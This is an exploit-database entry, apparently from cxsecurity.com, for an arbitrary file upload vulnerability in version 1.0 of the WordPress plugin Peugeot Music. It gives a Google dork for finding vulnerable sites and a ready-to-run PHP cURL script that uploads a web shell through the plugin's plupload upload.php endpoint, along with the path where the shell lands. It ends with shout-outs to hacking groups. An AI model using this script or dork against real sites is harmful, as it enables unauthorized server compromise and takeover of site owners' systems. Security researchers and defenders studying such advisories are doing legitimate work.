WordPress Peugeot Music 1.0 Shell Upload / Cross Site Request Forgery

2018.05.25
Credit: Mr.7z
Risk: High
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Wordpress Plugin Peugeot Music - Arbitrary File Upload # Google Dork: inurl:/wp-content/plugins/peugeot-music-plugin/ # Date: 2018-05-23 # Exploit Author: Mr.7z # Vendor Homepage: - # Software Link: - # Version: 1.0 # Tested on: Windows 10 64bit (Home Edition) # Exploit: /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php # Vuln? {"jsonrpc" : "2.0", "result" : null, "id" : "id"} # CSRF <?php $url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here $post = array ( "file" => "@yourshell.jpg", "name" => "yourshell.php" ); $ch = curl_init ("$url"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_POST, 1); @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post); $data = curl_exec ($ch); curl_close ($ch); echo $data; ?> # For CSRF using php xampp. # Shell Locate: target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php # Thanks To XaiSyndicate - Family Attack Cyber - HunterSec-Team - # Typical Idiot Security [!]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top